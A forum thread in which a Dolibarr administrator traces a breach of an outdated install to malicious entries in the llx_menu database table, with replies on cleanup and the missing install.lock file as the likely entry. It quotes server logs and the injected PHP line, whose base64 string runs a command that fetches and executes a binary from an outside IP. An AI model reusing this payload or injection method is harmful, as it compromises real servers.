Outdated Dolibarr instance database maliciously altered

KaKi87 · November 27, 2022, 6:48pm

Hello,

A few years ago, I installed the latest version of Dolibarr of that time on a client’s Debian/MySQL/Apache server.

Since then, no one ever bothered to update it, which I suppose is the reason why they got hacked.
Well, they didn’t update system packages either, so that could be it, maybe you’ll tell me.

The problem that was reported to me is : the login page’s appearance changed and the user is stuck on a blank page once logged in.

What I observed is :

the /theme/eldy/style.css.php endpoint return an HTTP 500 error on the login page ;
the /index.php endpoint returns an HTTP 500 error once logged in.

So, I opened /var/log/apache2/error.log, and found this :

--2022-11-23 16:08:27--  http://205.185.118.26:6622/javaa
Connecting to 205.185.118.26:6622... failed: Connection refused.
sh: 1: echo-->: not found
--2022-11-23 16:08:27--  http://205.185.118.26:6623/am32
Connecting to 205.185.118.26:6623... failed: Connection refused.
sh: 1: echo-->: not found
sh: 1: echo-->: not found
[Wed Nov 23 16:08:27.652329 2022] [:error] [pid 4912] [client 82.66.132.2:45944] PHP Parse error:  syntax error, unexpected ')' in /var/www/dolibarr/htdocs/core/lib/functions.lib.php(6805) : eval()'d code on line 1

It very much looks like a backdoor that stopped working, yes, but I didn’t want to believe this at the time.

So, simply treating it as an unknown bug, I did what I’d do by default : restore a backup dated earlier than the first bug’s occurence (I initially made a script that archives /var/www/dolibarr and dumps the MySQL database every day).
No issue occured, except the “bug” was (obviously) still occuring (since the hack must have occured a long time ago, while the hacker’s server was stopped a few days ago).

Then, I noticed that the failing endpoints return the following content :

<!--
pwned!!!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!--
pwned!!!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!--
pwned!!!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Finally convinced that a hack occured and assuming that Dolibarr PHP files were altered, I replaced all but the documents directory with a newly downloaded and extracted archive of the same running version.

But, nothing changed after that, so I now assumed that alteration occured at a system level, so I planned to make a system image, wipe the server, and finally restart from scratch, except for the documents directory and the database wich I would restore.

Meanwhile, I happened to wonder : what if it was the database and not the files ?
I would find that odd, as I don’t see how would a virus be located in a database.
Anyways, in order to exclude this hypothesis, I created an empty database and made a second Dolibarr installation using that one.
Turns out, it didn’t reproduce the bug !

So, I edited config.php and changed the dolibarr_main_db_name value with the first database’s name : that made the bug occur !
Then, I edited the first instance’s config.php and changed the same variable with the second database’s name : the bug was gone !

So, this confirms that the alteration actually occured in the database, not in the files, which means I need to locate it in order to recover Dolibarr.
But, how ?

I don’t have any MySQL dump old enough to make a before/after comparison.

Thanks.

riton75 · November 27, 2022, 6:55pm

Hi,

As you said : I don’t have any MySQL dump old enough to make a before/after comparison.
If you’re sure your dolibarr has been compromised, best way is to build a new dolibarr (same version as the one compromised) and try to restore your data in this new clean version.

Hope it helps.

Regards,

KaKi87 · November 27, 2022, 6:57pm

How do I restore the data without restoring the virus since it is located in the database ?

riton75 · November 27, 2022, 7:19pm

Hi,

It depends on the OS you’re running Dolibarr (windows/linux).
Usually, system/core files are compromised not the database.
To detect a compromise, try to scan files and database (SQL file dump) with a file scanner like :
Linux/PHP :
https://github.com/scr34m/php-malware-scanner

Hope it helps,

Regards

KaKi87 · November 27, 2022, 7:29pm

Unfortunately, that script doesn’t support SQL files.

KaKi87 · November 27, 2022, 7:41pm

Actually, I found the malicious code thanks to this StackOverflow answer : there are occurences of base64_decode in llx_menu.enabled :

1==1));$d=base64_decode('Y2QgL3RtcCAmJiB3Z2V0IGh0dHA6Ly8yMDUuMTg1LjExOC4yNjo2NjIzL2FtMzIgJiYgY2htb2QgNzc3IGFtMzIgJiYgLi9hbTMy');$a=base64_decode('c3lzdGVt');$a($d);//

riton75 · November 27, 2022, 7:50pm

File scanner is able to detect malicious code in files.
If you run a file scan on all files on the root folder containing the sql dump file (you have to generate that dump file and place it in a folder that will be scan), you’ll be able to find malicious code in the database also (unlikely).
Did you simply tried an update on your dolibarr installation ?
1 - make a backup (file+db)
2 - manually upadate dolibarr (FTP)
3 - run the update
4 - let see

Hope it helps !

Regards

KaKi87 · November 27, 2022, 8:00pm

It’s already confirmed : removing occurences of base64_decode from the database fixed the issue.

DELETE FROM llx_menu WHERE enabled LIKE '%base64_decode%';

Also, php-malware-scanner only supports PHP files, not SQL ones.

riton75 · November 27, 2022, 8:39pm

Perfect

Good continuation and success !

ksar · November 27, 2022, 8:43pm

Hello,

This needs to be linked with that : Dolibarr security : Without install.lock file, Dolibarr is vunerable

Basically, attacker create a new admin user with the installation script, and then create some menu entries.
So you also need to check llx_user, you must probably have a user that you do not create.